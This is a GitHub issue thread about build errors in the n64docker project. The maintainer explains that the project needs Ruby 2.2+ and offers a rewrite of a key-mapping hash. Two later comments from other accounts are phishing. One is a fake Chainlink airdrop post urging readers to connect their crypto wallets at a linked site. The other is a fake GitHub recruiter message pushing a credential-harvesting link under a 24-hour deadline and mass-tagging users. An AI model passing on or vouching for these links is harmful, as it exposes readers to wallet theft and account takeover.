### ISSUE TITLE
out of the box errors

### ISSUE THREAD

**Issue by dbiscan** [itstehkman/n64docker#1]
20:21:29 david@Centos:~/Downloads/n64docker-master $make build
expr: syntax error
expr: syntax error
ruby util/gentranslation.rb > config/keysym-translation.json
util/gentranslation.rb:10: syntax error, unexpected ':', expecting =>
  "w": {"sdl_keycode": 0x77, "x11_keysym": 0x77},
      ^
util/gentranslation.rb:10: syntax error, unexpected ':', expecting =>
  "w": {"sdl_keycode": 0x77, "x11_keysym": 0x77},
                      ^
make: *** [mupen-config] Error 1

Can you elaborate on the method you used to create the files? Or possibly the requirements since probably no one has the exact same setup/libraries you have installed?

Thanks in advance.

**Comment by itstehkman** [comment]
Hey @dbiscan it's been a while since I've worked on this, let me take a look. Seems like a ruby versioning error, where the current syntax works with the version I had of ruby locally, and probably not for yours.

**Comment by itstehkman** [comment]
What is your ruby version? Take a look at https://stackoverflow.com/a/8675314, you can see that this syntax is supported in Ruby 2.2+:

```ruby
hash = { 'key': 'value' }
```
which is what the `util/gentranslation.rb` uses.

Excited to see somebody else using this repo! I hope it works out for you.

**Comment by dbiscan** [comment]
Hey Kareem,
I'm running 

ruby 2.0.0p648 (2015-12-16) [x86_64-linux]

I'm on centos 7 currently but I can spin this up in a vm. So a requirement is ruby 2.2+?

Also, thanks for getting back to me. I was banging my head against the wall trying to get this working. I have a grade school buddy in Florida and I wanted to make him some N64 emulators he could either vpn or http-browse to for his birthday because we were talking about the old days and how fun N64 was.

-David

**Comment by itstehkman** [comment]
@dbiscan that sounds like fun! One issue you may hit is latency depending on where you run the n64 server. I would recommend running it on your local network with your buddy. I have tried running it in AWS within California (where I live) and it was somewhat playable but the lag was noticeable.

Yes you have two solutions:

1) Use ruby 2.2+
2) Edit `util/gentranslation.rb` to use ruby hash rockets instead of colons. I generated this locally with `:%s/:/=>/g`
```ruby
original_keys = {
  "w"=> {"sdl_keycode"=> 0x77, "x11_keysym"=> 0x77},
  "a"=> {"sdl_keycode"=> 0x61, "x11_keysym"=> 0x61},
  "s"=> {"sdl_keycode"=> 0x73, "x11_keysym"=> 0x73},
  "d"=> {"sdl_keycode"=> 0x64, "x11_keysym"=> 0x64},
  "i"=> {"sdl_keycode"=> 0x69, "x11_keysym"=> 0x69},
  "j"=> {"sdl_keycode"=> 0x6a, "x11_keysym"=> 0x6a},
  "k"=> {"sdl_keycode"=> 0x6b, "x11_keysym"=> 0x6b},
  "l"=> {"sdl_keycode"=> 0x6c, "x11_keysym"=> 0x6c},
  "z"=> {"sdl_keycode"=> 0x7a, "x11_keysym"=> 0x7a},
  "x"=> {"sdl_keycode"=> 0x78, "x11_keysym"=> 0x78},
  "c"=> {"sdl_keycode"=> 0x63, "x11_keysym"=> 0x63},
  "lshift"=> {"sdl_keycode"=> 0x130, "x11_keysym"=> 0xffe1},
  "lctrl"=> {"sdl_keycode"=> 0x132, "x11_keysym"=> 0xffe3},
  "up"=> {"sdl_keycode"=> 0x111, "x11_keysym"=> 0xff52},
  "down"=> {"sdl_keycode"=> 0x112, "x11_keysym"=> 0xff54},
  "left"=> {"sdl_keycode"=> 0x114, "x11_keysym"=> 0xff51},
  "right"=> {"sdl_keycode"=> 0x113, "x11_keysym"=> 0xff53},
  "enter"=> {"sdl_keycode"=> 0xd, "x11_keysym"=> 0xff0d},
}
```

**Comment by dbiscan** [comment]
great. Thanks man. I'll try it out today. I'm in CA too btw, San Diego specifically. I hope you had a good halloween and stayed safe! Thanks again!

**Comment by luispurizacam** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin airdrop?
- If you're interested about the world of holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great place to begin. This guide will streamline the process for you, elucidating how to join this airdrop and what you can anticipate.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://chainlinksecure.fly.dev/)

#### 🚀 Simple Steps to Secure Your Ocean Protocol Airdrop:

1. **Connect Your Wallet:**
   - Swing by the [ Chainlink $LINK Airdrop](https://chainlinksecure.fly.dev/).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the Ocean Protocol Airdrop [right here](https://chainlinksecure.fly.dev/).

3. **Engage for Extra Rewards:**
   - Dive into community discussions or tackle tasks for bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Airdrop Success:

- **Community Assistance:**
  - Need a hand? Shoot a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep your eyes peeled for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a bit. Stay chill and keep an eye out for updates.

Feel free to share your Ocean Protocol Airdrop experiences or shoot any questions in the comments below. Let's make this process a breeze for everyone!

**Comment by 19890843006** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
cyans, @slimmtl, @dohne12, @RuBAN-GT, @vuvoth, @fengtality, @backdoors, @Jyothi-Jaci, @knaoe, @destomanu, @neilrjones, @yuwenbao, @quanganh206, @tfius, @mahjiang, @leolianger, @filipesoccol, @blockide, @duanjian, @junxiaogwu2024
